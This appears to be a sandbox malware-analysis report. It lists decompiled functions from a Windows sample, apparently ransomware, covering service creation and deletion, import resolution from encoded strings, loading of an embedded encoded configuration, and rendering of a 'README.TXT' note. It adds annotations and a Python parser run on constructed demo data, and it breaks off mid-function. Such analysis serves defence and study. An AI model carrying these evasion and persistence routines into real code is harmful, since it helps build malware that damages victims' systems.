                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004026A6(short* _a4) {
                                                                                        				short _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				int _t17;
                                                                                        
                                                                                        				_v16 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_t17 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                        				_v12 = _t17;
                                                                                        				if(_v12 != 0) {
                                                                                        					_v8 = 0;
                                                                                        					_t17 = CreateServiceW(_v12, _a4, _a4, 0xf01ff, 0x110, 3, 0,  *0x40f5e2, 0, 0, 0, 0,  &_v8); // executed
                                                                                        					_v16 = _t17;
                                                                                        					if(_v16 != 0) {
                                                                                        						_t17 = StartServiceW(_v16, 0, 0);
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v16 != 0) {
                                                                                        					_t17 = CloseServiceHandle(_v16);
                                                                                        				}
                                                                                        				if(_v12 == 0) {
                                                                                        					return _t17;
                                                                                        				} else {
                                                                                        					return CloseServiceHandle(_v12);
                                                                                        				}
                                                                                        			}

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004026C3
                                                                                        • CreateServiceW.ADVAPI32(00000000,00000000,00000000,000F01FF,00000110,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402702
                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00402718
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00402727
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00402736
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$CreateManagerOpenStart
                                                                                        • String ID:
                                                                                        • API String ID: 1113237811-0
                                                                                        • Opcode ID: e3729441f882d05e3307cf1b3c736a3fe2a7a1c69a3440c71997bc884b448f0b
                                                                                        • Instruction ID: 6591c276e50952cfc18946ce3e51467d5e7a77df9009557fa70032c1d7a952fa
                                                                                        • Opcode Fuzzy Hash: e3729441f882d05e3307cf1b3c736a3fe2a7a1c69a3440c71997bc884b448f0b
                                                                                        • Instruction Fuzzy Hash: 2411B730940208BBEB229F94DD4AB9DBB75AB04701F208075B6107A5E1C7B51698DF49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402742(short* _a4) {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				int _t14;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_t14 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                        				_v8 = _t14;
                                                                                        				if(_v8 != 0) {
                                                                                        					_t14 = OpenServiceW(_v8, _a4, 0xf01ff);
                                                                                        					_v12 = _t14;
                                                                                        					if(_v12 != 0) {
                                                                                        						_t14 = DeleteService(_v12);
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v12 != 0) {
                                                                                        					_t14 = CloseServiceHandle(_v12);
                                                                                        				}
                                                                                        				if(_v8 == 0) {
                                                                                        					return _t14;
                                                                                        				} else {
                                                                                        					return CloseServiceHandle(_v8);
                                                                                        				}
                                                                                        			}

                                                                                        APIs
                                                                                        • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 0040275F
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 00402779
                                                                                        • DeleteService.ADVAPI32(00000000), ref: 0040278B
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 0040279A
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 004027A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandleOpen$DeleteManager
                                                                                        • String ID:
                                                                                        • API String ID: 204194956-0
                                                                                        • Opcode ID: f96fc0e545baaa93f84d176c4207b4243c7bdeec589f16eea602642f17e7ef94
                                                                                        • Instruction ID: 81241541473389439f97e5286b4cc305a8b963fcfda574e71078e9e96f46dba0
                                                                                        • Opcode Fuzzy Hash: f96fc0e545baaa93f84d176c4207b4243c7bdeec589f16eea602642f17e7ef94
                                                                                        • Instruction Fuzzy Hash: A201B630900209FBDB219F94DE4D79DBA71EB04311F6040B5E505766E0C7B50A98EA49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
			// Runtime import resolver. ESI points at a table of length-prefixed,
			// encoded strings: entry 0 is a DLL name, followed by EBX function names,
			// ended by a zero length. EDI points at the table that receives the
			// resolved addresses. Each name is copied to a 68-byte stack buffer
			// (_v76) and decoded in place by E0040A000 before LoadLibraryA or
			// GetProcAddress sees it, so the plaintext names exist only transiently
			// on the stack.
			E00401867(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				char _v76;
				void* _t15;
				void* _t19;
				void* _t23;
				void* _t37;
				void* _t42;
				void* _t43;
				void* _t44;

				_t42 = __esi;
				_t23 = __ebx;                              // number of function-name entries to read
				_t14 = __eax;
				asm("lodsd");                              // EAX = length of the DLL-name entry, ESI += 4
				if(__eax != 0) {
					_t15 = memcpy( &_v76, __esi, __eax);      // encoded DLL name -> stack buffer
					_t44 = _t43 + 0xc;
					_t37 = __edi;
					E0040A000( &_v76, _t15);                   // decode in place (the config loader uses the same routine)
					_t14 = LoadLibraryA( &_v76); // executed
					_v8 = _t14;
					if(_v8 != 0) {
						while(1) {
							asm("lodsd");                      // EAX = length of the next function-name entry
							if(_t14 == 0) {
								break;                         // zero length ends the table
							}
							_t19 = memcpy( &_v76, _t42, _t14);
							_t44 = _t44 + 0xc;
							E0040A000( &_v76, _t19);
							_t14 = GetProcAddress(_v8,  &_v76); // executed
							if(_t14 != 0) {
								asm("stosd");                  // store the address at EDI, EDI += 4; on failure
							}                                  // EDI is not advanced, so later entries shift down one slot
							_t23 = _t23 - 1;
							if(_t23 != 0) {
								continue;
							}
							goto L7;
						}
						return _t14;
					}
				}
				L7:
				return _t14;
			}
Instruction addresses for E00401867 (side column of the original layout, one per decompiled line): 0x00401867 to 0x004018d0.

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 0040188B
                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 004018BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2574300362-0
                                                                                        • Opcode ID: f44f76c3ab210d1589bbdff79bd4f9acd6f21cf33dcad1d260547685e3cc5fb9
                                                                                        • Instruction ID: 6865328a640b7593708d267312d9b00495b55e7551512d6d04cdd83f906ec8a8
                                                                                        • Opcode Fuzzy Hash: f44f76c3ab210d1589bbdff79bd4f9acd6f21cf33dcad1d260547685e3cc5fb9
                                                                                        • Instruction Fuzzy Hash: 1601627390021C9ADF15EAE48844AEFB7FDDF84304F088536D811F7190EB349A49D695
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
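The table layout that E00401867 walks, written out as a parser. This is an added example, not code from the report or from the sample: the [uint32 length][bytes] entries, the single DLL entry followed by EBX function entries, the zero terminator and the 68-byte stack buffer are read off the listing above. The real string decoder E0040A000 is not on the page, so `decode` is a pluggable callable and the single-byte XOR is an assumed stand-in; the table bytes, the names `parse_resolver_table`, `simulate_output_table` and `build_table`, and the NUL-terminated encoding of each name are constructed for the demo.

```python
"""Walk the resolver table read by E00401867 (added example, not from the report)."""
import struct
from typing import Callable, Dict, List, Tuple

# The listing copies each entry into _v76, a 68-byte stack buffer.
STACK_BUF = 68

Decoder = Callable[[bytes], bytes]


def identity(data: bytes) -> bytes:
    return data


def xor_decoder(key: int) -> Decoder:
    """Assumed stand-in for E0040A000, whose real algorithm is not on the page."""
    return lambda data: bytes(b ^ key for b in data)


def _lodsd(blob: bytes, pos: int) -> Tuple[int, int]:
    """One `lodsd`: read a little-endian uint32 at pos and advance by 4."""
    if pos + 4 > len(blob):
        raise ValueError("table runs past the end of the blob")
    return struct.unpack_from("<I", blob, pos)[0], pos + 4


def _entry(blob: bytes, pos: int, length: int, decode: Decoder) -> Tuple[str, int]:
    """memcpy + decode of one entry, with the stack-buffer bound the sample itself has."""
    if length > STACK_BUF:
        raise ValueError(f"entry of {length} bytes exceeds the 68-byte stack buffer")
    if pos + length > len(blob):
        raise ValueError("entry runs past the end of the blob")
    name = decode(blob[pos:pos + length]).split(b"\0", 1)[0].decode("ascii")
    return name, pos + length


def parse_resolver_table(blob: bytes, offset: int, count: int,
                         decode: Decoder = identity) -> Tuple[str, List[str], int]:
    """Mirror the control flow of E00401867.

    Returns (dll_name, function_names, next_offset). `count` plays the role of
    EBX: at most `count` function entries are read, and a zero length stops the
    loop early (it is consumed, exactly as `lodsd` consumes it).
    """
    length, pos = _lodsd(blob, offset)
    if length == 0:
        return "", [], pos                    # empty DLL entry: nothing is resolved
    dll, pos = _entry(blob, pos, length, decode)
    funcs: List[str] = []
    remaining = count
    while remaining > 0:
        length, pos = _lodsd(blob, pos)
        if length == 0:
            break
        name, pos = _entry(blob, pos, length, decode)
        funcs.append(name)
        remaining -= 1
    return dll, funcs, pos


def simulate_output_table(funcs: List[str], lookup: Dict[str, int]) -> List[int]:
    """Reproduce the stosd behaviour: a failed GetProcAddress writes nothing and
    does not advance EDI, so every later address lands one slot earlier."""
    out: List[int] = []
    for name in funcs:
        addr = lookup.get(name)
        if addr is not None:
            out.append(addr)
    return out


def build_table(dll: str, funcs: List[str], encode: Decoder = identity) -> bytes:
    """Constructed test data in the inferred layout (NUL-terminated names)."""
    out = bytearray()
    for name in [dll] + funcs:
        enc = encode(name.encode("ascii") + b"\0")
        out += struct.pack("<I", len(enc)) + enc
    out += struct.pack("<I", 0)               # zero length terminates the list
    return bytes(out)


DEMO_KEY = 0x5A                               # constructed; XOR is its own inverse
DEMO_TABLE = build_table("kernel32.dll", ["CreateFileW", "WriteFile", "CloseHandle"],
                         xor_decoder(DEMO_KEY))

if __name__ == "__main__":
    dll, funcs, end = parse_resolver_table(DEMO_TABLE, 0, 16, xor_decoder(DEMO_KEY))
    print(dll, funcs, hex(end))
```

Running it against a dump of the real table would require substituting the sample's decoder for `xor_decoder`. `simulate_output_table` makes the observation from the listing concrete: if one name fails to resolve, the caller's address table is not left with a zero slot but compacted, so any code that indexes that table by position calls the wrong API.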

                                                                                        C-Code - Quality: 100%
			// Embedded-configuration loader. Reads a length from the PE header of the
			// running image (IMAGE_NT_HEADERS + 0x8c), copies that many bytes minus
			// 0x20 from the fixed address 0x410030 into a heap buffer, decodes them
			// with E0040A000 (the routine the API resolver also uses), unpacks the
			// result with E0040A135 (not shown here) into a second buffer four times
			// as large, then copies nine NUL-terminated string fields, referenced by
			// 32-bit offsets at +0xc .. +0x2c of the unpacked buffer, into heap
			// strings stored at the globals 0x40f5b2 .. 0x40f5d2. *0x40f5d6 holds the
			// heap handle; flag 8 to RtlAllocateHeap is HEAP_ZERO_MEMORY.
			E00402A44(void* __eax) {
				void* _v8;
				void* _v12;
				intOrPtr _t44;
				void* _t45;
				void* _t51;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				long _t76;
				long _t79;
				long _t82;
				long _t85;
				long _t88;
				long _t91;
				long _t94;
				long _t97;
				long _t111;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t131;

				_t44 =  *0x40f5da; // 0x400000            image base
				_t1 = _t44 + 0x3c; // 0x80                 &IMAGE_DOS_HEADER.e_lfanew
				_t111 =  *( *_t1 + _t44 + 0x8c);          // length slot at IMAGE_NT_HEADERS + 0x8c
				_t45 = RtlAllocateHeap( *0x40f5d6, 8, _t111);
				_v8 = _t45;
				if(_v8 == 0) {
					return _t45;
				}
				memcpy(_v8, 0x410030, _t111 - 0x20);      // raw config bytes from the image
				_t128 = _t127 + 0xc;
				E0040A000(_v8, _t111 - 0x20);             // decode in place
				_t51 = RtlAllocateHeap( *0x40f5d6, 8, _t111 * 4); // executed
				_v12 = _t51;
				if(_v12 != 0) {
					if(E0040A135(_v8, _v12) != 0xffffffff) {   // unpack _v8 -> _v12; -1 signals failure
						// _t126 below is presumably the unpacked buffer (the decompiler did not
						// recover the assignment). Each field holds an offset, relative to that
						// buffer, to a NUL-terminated string; a zero offset means the field is absent.
						_t63 =  *((intOrPtr*)(_t126 + 0xc));   // field 1
						if(_t63 != 0) {
							_t120 = _t63 + _t126;
							_t97 = strlen(_t63 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5b2 = RtlAllocateHeap( *0x40f5d6, 8, _t97);
							if( *0x40f5b2 != 0) {
								E0040120C(_t120,  *0x40f5b2);   // copy the field string into the new buffer
							}
						}
						_t64 =  *((intOrPtr*)(_t126 + 0x10));  // field 2
						if(_t64 != 0) {
							_t119 = _t64 + _t126;
							_t94 = strlen(_t64 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5b6 = RtlAllocateHeap( *0x40f5d6, 8, _t94);
							if( *0x40f5b6 != 0) {
								E0040120C(_t119,  *0x40f5b6);
							}
						}
						_t65 =  *((intOrPtr*)(_t126 + 0x14));  // field 3
						if(_t65 != 0) {
							_t118 = _t65 + _t126;
							_t91 = strlen(_t65 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ba = RtlAllocateHeap( *0x40f5d6, 8, _t91);
							if( *0x40f5ba != 0) {
								E0040120C(_t118,  *0x40f5ba);
							}
						}
						_t66 =  *((intOrPtr*)(_t126 + 0x18));  // field 4
						if(_t66 != 0) {
							_t117 = _t66 + _t126;
							_t88 = strlen(_t66 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5be = RtlAllocateHeap( *0x40f5d6, 8, _t88);
							if( *0x40f5be != 0) {
								E0040120C(_t117,  *0x40f5be);
							}
						}
						_t67 =  *((intOrPtr*)(_t126 + 0x1c));  // field 5
						if(_t67 != 0) {
							_t116 = _t67 + _t126;
							_t85 = strlen(_t67 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5c2 = RtlAllocateHeap( *0x40f5d6, 8, _t85);
							if( *0x40f5c2 != 0) {
								E0040120C(_t116,  *0x40f5c2);
							}
						}
						_t68 =  *((intOrPtr*)(_t126 + 0x20));  // field 6
						if(_t68 != 0) {
							_t115 = _t68 + _t126;
							_t82 = strlen(_t68 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5c6 = RtlAllocateHeap( *0x40f5d6, 8, _t82);
							if( *0x40f5c6 != 0) {
								E0040120C(_t115,  *0x40f5c6);
							}
						}
						_t69 =  *((intOrPtr*)(_t126 + 0x24));  // field 7
						if(_t69 != 0) {
							_t114 = _t69 + _t126;
							_t79 = strlen(_t69 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ca = RtlAllocateHeap( *0x40f5d6, 8, _t79);
							if( *0x40f5ca != 0) {
								E0040120C(_t114,  *0x40f5ca);
							}
						}
						_t70 =  *((intOrPtr*)(_t126 + 0x28));  // field 8
						if(_t70 != 0) {
							_t113 = _t70 + _t126;
							_t76 = strlen(_t70 + _t126);
							_t131 = _t131 + 4;
							 *0x40f5ce = RtlAllocateHeap( *0x40f5d6, 8, _t76);
							if( *0x40f5ce != 0) {
								E0040120C(_t113,  *0x40f5ce);
							}
						}
						_t71 =  *((intOrPtr*)(_t126 + 0x2c));  // field 9: the only one post-processed (E00401000)
						if(_t71 != 0) {
							_t112 = _t71 + _t126;
							 *0x40f5d2 = RtlAllocateHeap( *0x40f5d6, 8, strlen(_t71 + _t126));
							if( *0x40f5d2 != 0) {
								 *0x40f5f2 = E0040120C(_t112,  *0x40f5d2);
								 *0x40f5f6 = 0;
								 *0x40f5ee = E00401000( *0x40f5d2, _t74, 0xffffffff);
							}
						}
					}
					RtlFreeHeap( *0x40f5d6, 0, _v12);         // unpacked buffer freed; the copied strings remain
				}
				return RtlFreeHeap( *0x40f5d6, 0, _v8);      // raw (decoded) buffer freed
			}
Instruction addresses for E00402A44 (side column of the original layout, one per decompiled line): 0x00402a50 to 0x00402d7c, with the early-return path at 0x00402e43.
                                                                                        0x00402d81
                                                                                        0x00402d83
                                                                                        0x00402d87
                                                                                        0x00402d8d
                                                                                        0x00402d9f
                                                                                        0x00402dab
                                                                                        0x00402db4
                                                                                        0x00402db4
                                                                                        0x00402dab
                                                                                        0x00402db9
                                                                                        0x00402dbe
                                                                                        0x00402dc0
                                                                                        0x00402ddc
                                                                                        0x00402de8
                                                                                        0x00402df6
                                                                                        0x00402dfb
                                                                                        0x00402e13
                                                                                        0x00402e13
                                                                                        0x00402de8
                                                                                        0x00402dbe
                                                                                        0x00402e23
                                                                                        0x00402e23
                                                                                        0x00000000

APIs
• RtlAllocateHeap.NTDLL(00000008,?), ref: 00402A69
• memcpy.NTDLL(00000000,00410030,?,?,?,?,?,?,00000000), ref: 00402A88
• RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00402AAD
• memcpy.NTDLL(0040F470,00000000,00000100,00000000,00000000,?,?,00000000), ref: 00402AE2
• memcpy.NTDLL(0601ac206b9e361,00000000,00000020), ref: 00402AFB
• memcpy.NTDLL(0040F590,?,00000016), ref: 00402B0F
• strlen.NTDLL ref: 00402B25
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B37
• strlen.NTDLL ref: 00402B62
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B74
• strlen.NTDLL ref: 00402B9F
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402BB1
• strlen.NTDLL ref: 00402BDC
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402BEE
• strlen.NTDLL ref: 00402C19
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402C2B
• strlen.NTDLL ref: 00402C56
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402C68
• strlen.NTDLL ref: 00402C93
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402CA5
• strlen.NTDLL ref: 00402CD0
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402CE2
• strlen.NTDLL ref: 00402D0D
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D1F
• strlen.NTDLL ref: 00402D4A
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D5C
• strlen.NTDLL ref: 00402D87
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402D99
• strlen.NTDLL ref: 00402DC4
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402DD6
• RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00402E23
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402E34
Strings
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Heap$Allocate$strlen$memcpy$Free
• String ID: 0601ac206b9e361
• API String ID: 1087655705-1052532395
• Opcode ID: 2a71c198e7e4f346b8b2df26f47f8ffc5aaa2b2be3aaa555b2667f05d0419615
• Instruction ID: 6dd33a262d8d6808e7544aefd3a1654a332af83014f008ca0f40a54b6a02e8da
• Opcode Fuzzy Hash: 2a71c198e7e4f346b8b2df26f47f8ffc5aaa2b2be3aaa555b2667f05d0419615
• Instruction Fuzzy Hash: DDB11971141204BFE721AF74EE89F563768BB04305F040576E502B2AB2EB79A96DCB5C
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 51%
E00401E1B(intOrPtr _a4) {
	char _v16;
	char _v90;
	void* _t16;
	void* _t18;
	signed char _t22;
	void* _t24;
	intOrPtr* _t25;
	void* _t26;
	void* _t27;
	void* _t30;

	_t29 =  &_v90; /* 0x00401e26 */
	_t16 = E00401D45( &_v90); /* 0x00401e2c */ // executed
	if(_t16 != 0) { /* 0x00401e33 */
		_t18 = E00401060(_t29, _t16 - 2, 0); /* 0x00401e3c */
		_t24 = 0; /* 0x00401e41 */
		while(1) { /* 0x00401e43 */
			asm("lodsw"); /* 0x00401e43 */
			if(_t18 == 0) { /* 0x00401e48 */
				break; /* 0x00000000 */
			} /* 0x00000000 */
			asm("stosb"); /* 0x00401e4d */
			_t24 = _t24 + 1; /* 0x00401e4e */
		} /* 0x00401e4e */
		asm("stosb"); /* 0x00401e4a */
		_t30 = E00401060( &_v90, _t24, 1); /* 0x00401e5d */
		_t26 = 0; /* 0x00401e5f */
		do { /* 0x00401e61 */
			 *(_t30 + _t26) =  *(_t30 + _t26) ^  *(_t30 + _t26 + 8); /* 0x00401e65 */
			_t26 = _t26 + 1; /* 0x00401e68 */
		} while (_t26 != 8); /* 0x00401e69 */
		_t27 = 0; /* 0x00401e6e */
		do { /* 0x00401e70 */
			_t22 =  *((intOrPtr*)(_t30 + _t27 + 4)); /* 0x00401e70 */
			 *(_t30 + _t27) =  *(_t30 + _t27) ^ _t22; /* 0x00401e74 */
			_t27 = _t27 + 1; /* 0x00401e77 */
		} while (_t27 != 4); /* 0x00401e78 */
		asm("lodsd"); /* 0x00401e7d */
		_t25 =  &_v16; /* 0x00401e7e */
		 *_t25 = 0x25002e; /* 0x00401e81 */
		 *((intOrPtr*)(_t25 + 4)) = 0x38002e; /* 0x00401e87 */
		 *((intOrPtr*)(_t25 + 8)) = 0x78; /* 0x00401e8e */
		return  *0x40f69c(_a4, _t25, _t22); /* 0x00000000 */
	} /* 0x00401ea0 */
	return _t16; /* 0x00401eab */
}

APIs
  • Part of subcall function 00401D45: RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
  • Part of subcall function 00401D45: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
  • Part of subcall function 00401D45: memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
  • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
  • Part of subcall function 00401D45: NtClose.NTDLL(?), ref: 00401DF8
  • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
• _swprintf.NTDLL ref: 00401E9A
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: FreeHeap$CloseCreateQueryValue_swprintfmemcpy
• String ID:
• API String ID: 1894435707-0
• Opcode ID: 8c1904ace30f707bd0fe08a0591b3e3e595044fed4b464771ae484e0445296ef
• Instruction ID: 64453af2d1555abea667a0ec36192deb977e15eacdcbbf3aa353750e63bc0de6
• Opcode Fuzzy Hash: 8c1904ace30f707bd0fe08a0591b3e3e595044fed4b464771ae484e0445296ef
• Instruction Fuzzy Hash: 6111AF754042042ED7228B64DC81ABFBBDCDF05750F0041BFFD46BA1A6DA35990AC2B8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
_entry_() {
	void* _t6;

	E0040A047(0x410010, 0x410020, 0x10); /* 0x0040a31b */
	E0040A288(); /* 0x0040a320 */
	E0040A2B5(); /* 0x0040a325 */
	E0040A2DE(); /* 0x0040a32a */ // executed
	E0040911D(_t6); /* 0x0040a32f */ // executed
	ExitProcess(0); /* 0x0040a336 */
}

APIs
Memory Dump Source
• Source File: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 2d53bed1dda3daf35fafb28ebe3648b3b9da0bcde364d634d2851ad2a3ed169f
• Instruction ID: 307ea9a0ff79c5690ad25331125684f8784bd9f5ad9da6b53b9bddff386912e8
• Opcode Fuzzy Hash: 2d53bed1dda3daf35fafb28ebe3648b3b9da0bcde364d634d2851ad2a3ed169f
• Instruction Fuzzy Hash: 4FC0483039031826E0907BF2280BB8C2A04AF4AB4DF5004BFB651382C34EFE10A0653F
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 61%
E004033B9(intOrPtr _a4) {
	void* _v8;
	void* _v12;
	long _v16;
	long _v20;
	struct HDC__* _v24;
	struct HDC__* _v28;
	wchar_t* _v32;
	short* _v36;
	short* _v40;
	unsigned int _v44;
	signed int _v48;
	struct HFONT__* _v52;
	void* _v56;
	struct tagSIZE _v64;
	void* _v68;
	void* _v72;
	void* _v76;
	struct tagRECT _v92;
	long _v116;
	long _v120;
	signed short _v122;
	short _v124;
	signed int _v128;
	signed int _v132;
	void _v136;
	intOrPtr _v142;
	short _v144;
	short _v146;
	intOrPtr _v150;
	void _v152;
	char _v164;
	short _v684;
	signed int _t217;
	intOrPtr* _t232;
	int _t259;
	WCHAR* _t261;
	int _t262;
	wchar_t* _t263;
	signed int _t268;
	wchar_t* _t280;

	_v20 = 0;
	_v24 = 0;
	_v28 = 0;
	_v32 = 0;
	_v36 = 0;
	_v40 = 0;
	_v52 = 0;
	_v56 = 0;
                                                                                        				_v68 = 0;
                                                                                        				_v72 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v20 =  *0x40f82c(0);
                                                                                        				if(_v20 != 0) {
                                                                                        					_v24 =  *0x40f864(_v20);
                                                                                        					if(_v24 != 0) {
                                                                                        						_v28 =  *0x40f864(_v20);
                                                                                        						if(_v28 != 0) {
                                                                                        							_v48 =  *0x40f854(_v20, 8) + 0x00000001 & 0xfffffffe;
                                                                                        							_v44 =  *0x40f854(_v20, 0xa) + 0x00000001 & 0xfffffffe;
                                                                                        							_t261 =  &_v164;
                                                                                        							 *_t261 = 0x720041;
                                                                                        							_t261[2] = 0x610069;
                                                                                        							_t261[4] = 0x6c;
                                                                                        							_v52 = CreateFontW(_v44 /  *0x40f854(_v20, 0x58) * 7, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 7, 0, 2, 0, _t261);
                                                                                        							if(_v52 != 0) {
                                                                                        								if(SelectObject(_v24, _v52) != 0) {
                                                                                        									_v56 = RtlAllocateHeap( *0x40f5d6, 8, 0x800);
                                                                                        									if(_v56 != 0) {
                                                                                        										if( *0x40f610 == 0) {
                                                                                        											 *0x40f610 = 0x450052;
                                                                                        											 *0x40f614 = 0x440041;
                                                                                        											 *0x40f618 = 0x45004d;
                                                                                        											 *0x40f61c = 0x54002e;
                                                                                        											 *0x40f620 = 0x540058;
                                                                                        										}
                                                                                        										_t262 =  *0x40f69c(_v56, _a4, 0x40f610);
                                                                                        										if(GetTextExtentPoint32W(_v24, _v56, _t262,  &_v64) != 0) {
                                                                                        											_v68 =  *0x40f860(_v24, _v48, _v44);
                                                                                        											if(_v68 != 0) {
                                                                                        												if(SelectObject(_v24, _v68) != 0) {
                                                                                        													asm("rol eax, 0x8");
                                                                                        													SetTextColor(_v24, 0);
                                                                                        													SetBkMode(_v24, 2);
                                                                                        													asm("rol eax, 0x8");
                                                                                        													SetBkColor(_v24, 0);
                                                                                        													_v92.left = 0;
